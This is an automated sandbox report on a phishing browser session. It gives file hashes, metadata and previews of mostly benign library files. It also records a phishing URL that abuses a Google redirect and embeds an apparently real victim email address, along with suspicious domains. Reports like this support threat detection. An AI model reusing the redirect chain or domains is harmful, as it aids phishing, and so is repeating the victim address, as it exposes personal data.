                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Detection:MAL
                                                                                        Classification:mal64.phis.win@21/45@32/13
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.184.238, 74.125.206.84, 34.104.35.123, 4.245.163.56, 199.232.210.172, 192.229.221.95, 20.242.39.171, 13.85.23.206, 2.23.209.158, 2.23.209.135, 2.23.209.176, 2.23.209.141, 2.23.209.150, 2.23.209.177, 2.23.209.130, 2.23.209.140, 2.23.209.149, 2.23.209.187, 2.23.209.148, 2.23.209.185, 2.23.209.189, 2.23.209.133, 172.217.16.195, 92.123.104.46, 92.123.104.36, 92.123.104.34, 92.123.104.38, 92.123.104.35, 92.123.104.32, 92.123.104.43, 92.123.104.31, 92.123.104.30, 172.217.23.106, 142.250.186.138, 216.58.206.42, 216.58.212.138, 142.250.74.202, 172.217.18.10, 142.250.186.42, 142.250.181.234, 172.217.16.138, 142.250.185.106, 172.217.16.202, 142.250.184.202, 216.58.206.74, 216.58.212.170, 142.250.186.106, 142.250.184.234
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, clientservices.googleapis.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, th.bing.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, th.bing.com.edgekey.net, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, p-th.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com
                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/bill.wafford@qurateretail.com
                                                                                        No simulations
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):47992
                                                                                        Entropy (8bit):5.605846858683577
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                        MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                        SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                        SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                        SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (47671)
                                                                                        Category:dropped
                                                                                        Size (bytes):47672
                                                                                        Entropy (8bit):5.401921124762015
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:OeCtueCACDHsEW8tZunqu5TTfjdTdWm54gEnih4A2WibLXKUEn+V1Kgbdfi0Vdua:OvXmHFW8tZuquNP54VnKJ3UEsnpj
                                                                                        MD5:B804BCD42117B1BBE45326212AF85105
                                                                                        SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                                                        SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                                                        SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):40
                                                                                        Entropy (8bit):4.396439344671014
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:mSnuZoStkORnQSHmn:mSnuZoStHRnnmn
                                                                                        MD5:0678DB334DCA2322F0E8C3B04D016EF8
                                                                                        SHA1:654D2FD34F61FCE3E7259FD7BE4AE2B9644C7535
                                                                                        SHA-256:1673D1875C0B7B2D615AE265BFFC1C6ADF204E5F0C07D4FA64495239016DB214
                                                                                        SHA-512:48B87F582BA4FB593F8DE9FC48AFEE3D38DAEEA5BF2FAA92EC9C751BDAA43739C8B7404F24B0C389391A6961C04BEAF75A0429B6336FF5621D4F3191B9CDF2ED
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgnexd5qw0fVqRIFDZFhlU4SBQ1QC6-wEgUNBu27_w==?alt=proto
                                                                                        Preview:ChsKBw2RYZVOGgAKBw1QC6+wGgAKBw0G7bv/GgA=
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 116672, version 773.256
                                                                                        Category:downloaded
                                                                                        Size (bytes):116672
                                                                                        Entropy (8bit):7.9897401211491745
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:y+cQdfEX4HdgCsxZhk8minCk+uU254aiRt3kLVzLm/j+G01Z:KQdfjIiib+uUe1EK66G4
                                                                                        MD5:0474CCD4D3EC29857F1E7F8B9C56DF8B
                                                                                        SHA1:3E8F0F46B2949DCC309F65FFF1372B9A05E8F480
                                                                                        SHA-256:B66B3DA5FF7B2DB79B6CB5A22C3E762E2BF16958A11987E69EEB1980BBBCDFB0
                                                                                        SHA-512:2AB61A54EE830519D0AACBA1E12F1AD920AEDDDEA8E682CEBE51BEC78ECD7BBC403343F8E00B45AFE804A954A52EB5DCC70983BB01239C36422F8E6F18E0BB5E
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2
                                                                                        Preview:wOF2...................s.........................6.$. .`..H..V....L.... %H.qj..0=....yPF.....PUUO.a^..* ...o...o.........; ..o..~..u../..b...Y.u*.K......2..w.._..p.....1.n/...../F..t....O.e..:.....?..........B.U...4...G".@7...J.I.TZB......3..;.....c.5i-m.8.Z.:.&..iS..'.G.G...........~....>D.U....,.................%.d.1...p.8a'...h.Q..0Tp.J....)&)q.......9W.D.Z...f..{.{...[g.5.v..E4y...DCt..1b|./.....$.......$.'Y..m.,.......t...,6...Ni...)!f..-O.> '?..........L2....eDW.e..cY......*..B......-5../f...i......3.ai$.%[6.K..`..a.x...;.L.qN]vy...oC....g.:.3...I...d....Z....{+..@.eFV...92F.u...Vi..9...}...y.=..=r.=".?"s.=".?2..3..Lr".(Z....$..@....R.{&..#...L...0..h......H.-A.Y.$.`k..U.49Z,.f..Y'..`.f.f5..lVB(.2+p.[.@*...*......aCf...........F.Y...:kU-k.0....._.:..d8.,.$6.......ld29.....{.y..!..UF#..`P........M.....~.~.......FE+....W..a%......*j....j.=........y..~Y...=..]?.&......<...o.{....t....8.,......E ..%.@.E..G.h....Y.}.~d...5./...m4....r.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):1249
                                                                                        Entropy (8bit):5.242453121762845
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:hYYIzD6yJRA3ZsjNQCRtgoLY95Mu56+eDHHLFCOXAkRcfRrzd0Ll72rKQk:rq6Kj2CZLY5Mc6NDLYzkYKLlOM
                                                                                        MD5:F58515DFE987F7E027C8A71BBC884621
                                                                                        SHA1:BEC6AEBF5940EA88FBBFF5748D539453D49FA284
                                                                                        SHA-256:679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
                                                                                        SHA-512:F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://ecoutura.sa.com/favicon.ico
                                                                                        Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (52276)
                                                                                        Category:downloaded
                                                                                        Size (bytes):102526
                                                                                        Entropy (8bit):4.781903903660331
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:vwMCMPMCMjMCM4MCMwMCM3sVMX709gbPMfjSFOTyPG9ZpgmLCq:P709gMGFiyPG9ZimLCq
                                                                                        MD5:C43CD173EEEBA2F72AA6B431D06B8C07
                                                                                        SHA1:427A692F7F39EABB3D5B8510AEE2743025DAF813
                                                                                        SHA-256:C880EB3D25C765D399840AA204FEC22B3230310991089F14781F09A35ED80B8A
                                                                                        SHA-512:02F6F6422B83104BC1E1B64961D7EDDA63635528417ED2DD3C6F0527457B8AB4CB43C528D2A70FC61E0F96AEC6E6D1A6D2B53ED523E1568B6D78BA41111C1393
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                                        Preview:/*!. * Font Awesome Free 6.5.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2023 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 116672, version 773.256
                                                                                        Category:downloaded
                                                                                        Size (bytes):116672
                                                                                        Entropy (8bit):7.9897401211491745
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:y+cQdfEX4HdgCsxZhk8minCk+uU254aiRt3kLVzLm/j+G01Z:KQdfjIiib+uUe1EK66G4
                                                                                        MD5:0474CCD4D3EC29857F1E7F8B9C56DF8B
                                                                                        SHA1:3E8F0F46B2949DCC309F65FFF1372B9A05E8F480
                                                                                        SHA-256:B66B3DA5FF7B2DB79B6CB5A22C3E762E2BF16958A11987E69EEB1980BBBCDFB0
                                                                                        SHA-512:2AB61A54EE830519D0AACBA1E12F1AD920AEDDDEA8E682CEBE51BEC78ECD7BBC403343F8E00B45AFE804A954A52EB5DCC70983BB01239C36422F8E6F18E0BB5E
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2
                                                                                        Preview:wOF2...................s.........................6.$. .`..H..V....L.... %H.qj..0=....yPF.....PUUO.a^..* ...o...o.........; ..o..~..u../..b...Y.u*.K......2..w.._..p.....1.n/...../F..t....O.e..:.....?..........B.U...4...G".@7...J.I.TZB......3..;.....c.5i-m.8.Z.:.&..iS..'.G.G...........~....>D.U....,.................%.d.1...p.8a'...h.Q..0Tp.J....)&)q.......9W.D.Z...f..{.{...[g.5.v..E4y...DCt..1b|./.....$.......$.'Y..m.,.......t...,6...Ni...)!f..-O.> '?..........L2....eDW.e..cY......*..B......-5../f...i......3.ai$.%[6.K..`..a.x...;.L.qN]vy...oC....g.:.3...I...d....Z....{+..@.eFV...92F.u...Vi..9...}...y.=..=r.=".?"s.=".?2..3..Lr".(Z....$..@....R.{&..#...L...0..h......H.-A.Y.$.`k..U.49Z,.f..Y'..`.f.f5..lVB(.2+p.[.@*...*......aCf...........F.Y...:kU-k.0....._.:..d8.,.$6.......ld29.....{.y..!..UF#..`P........M.....~.~.......FE+....W..a%......*j....j.=........y..~Y...=..]?.&......<...o.{....t....8.,......E ..%.@.E..G.h....Y.}.~d...5./...m4....r.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65342)
                                                                                        Category:downloaded
                                                                                        Size (bytes):232914
                                                                                        Entropy (8bit):4.979822227315486
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:VYutjsbf98fOdBfvO5wlP7Qy9A374298wsY/ElV6V6pz600I41r:ntj898fo298uI6V6pz600I41r
                                                                                        MD5:FE7FDFEC700D100DC745DC64D3600CB2
                                                                                        SHA1:B231651E0FD68BBD8758189FBD3642C462D34FA6
                                                                                        SHA-256:7F1D37F0D90B6385354C2AC10E2BB91563C46BD7A266ED351222EBCAC8496C2A
                                                                                        SHA-512:B7819649564ED5E0BC04CDF7F5777B529870E6CD7B6BCEAD219223F2A4718672AE6FA5A8CA19EBC5E08831E02A04F81D646942706D8FAD98CC73E5ABEFCFB95E
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css
                                                                                        Preview:@charset "UTF-8";/*!. * Bootstrap v5.3.0 (https://getbootstrap.com/). * Copyright 2011-2023 The Bootstrap Authors. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root,[data-bs-theme=light]{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-black:#000;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-gray-100:#f8f9fa;--bs-gray-200:#e9ecef;--bs-gray-300:#dee2e6;--bs-gray-400:#ced4da;--bs-gray-500:#adb5bd;--bs-gray-600:#6c757d;--bs-gray-700:#495057;--bs-gray-800:#343a40;--bs-gray-900:#212529;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-primary-rgb:13,110,253;--bs-secondary-rgb:108,117,125;--bs-success-rgb:25,135,84;--bs-info-rgb:13,202,240;--bs-warning-rgb:255,193,7;--bs-danger-rgb:220,
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):7499
                                                                                        Entropy (8bit):4.727821156397968
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:DV7EFKjyAkICVd1gY9uhaznjQ55LJmojAfEY:J7EF5IC2muhazYJPXY
                                                                                        MD5:FC1699D776B6292B6E4915E557F3B4D0
                                                                                        SHA1:B722BC57216A567CF70C86443D484824D71C831B
                                                                                        SHA-256:CFF581DB52A6BDD35BCC578C2AE42FC955BBD81B4D3A06A62016E2D09E3F2E50
                                                                                        SHA-512:7937B80E091A4A3FF66B44210F0D2563E2E2E3ECA2ED3C759D028E03E50AB7B10DF7F4741466CBF011A587858B94C2E5296933C6744058B9B391220CA17BC618
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://getplancgfe.ru//
                                                                                        Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Ultimate Supercar League - getplancgfe.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet">..</head>..<body>....<nav class="navbar navbar-expand-lg navbar-dark bg-dark sticky-top">.. <div class="container">.. <a class="navbar-brand fw-bold" href="https://getplancgfe.ru//">.. <i class="fas fa-car"></i> Ultimate Supercar League - AutoShowroom.. </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">.. <span class
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with very long lines (1238)
                                                                                        Category:dropped
                                                                                        Size (bytes):1239
                                                                                        Entropy (8bit):5.068464054671174
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ch63Cf5W8QPIHRZ3hwVFS39bYGwNef1yTZsNUkQ1sZmSuLqNWRco5Jcn5IKM6cuY:C6SQnw/x+SR8ZZkQbp1RZ5JwiKMm7Zc
                                                                                        MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                                                                        SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                                                                        SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                                                                        SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with very long lines (1238)
                                                                                        Category:downloaded
                                                                                        Size (bytes):1239
                                                                                        Entropy (8bit):5.068464054671174
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ch63Cf5W8QPIHRZ3hwVFS39bYGwNef1yTZsNUkQ1sZmSuLqNWRco5Jcn5IKM6cuY:C6SQnw/x+SR8ZZkQbp1RZ5JwiKMm7Zc
                                                                                        MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                                                                        SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                                                                        SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                                                                        SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://getplancgfe.ru/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                                                                                        Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 100 x 35, 8-bit/color RGB, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):4.035372245524405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPlpct/cTAkxl/k4E08up:6v/lhPot/k7Tp
                                                                                        MD5:C60E583F6E0BA715A7D50581BF1768B9
                                                                                        SHA1:2B83E430D125C3FFBB966A647F5DBDC5714101CA
                                                                                        SHA-256:CFD7749689008B63A44F3FBBB2C131BA7908213EF1D4C31894A975D19484BD46
                                                                                        SHA-512:2806E04FFD7C73E54431460BF76789CCAB5D0F549ED873BC0781A5BA9432996404A16602E310BD2C882EC0A6D63436CF18EB2BACC4CE8915307CBBA68DACA528
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8dbbfc65ff9e6b31/1730465170459/bzBIJqatPd8Kn9g
                                                                                        Preview:.PNG........IHDR...d...#.......8.....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):315
                                                                                        Entropy (8bit):5.0572271090563765
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                                        MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                                        SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                                        SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                                        SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:http://ir.nbaikp3.sa.com/favicon.ico
                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):47992
                                                                                        Entropy (8bit):5.605846858683577
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                        MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                        SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                        SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                        SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                        Malicious:false
                                                                                        Reputation:low
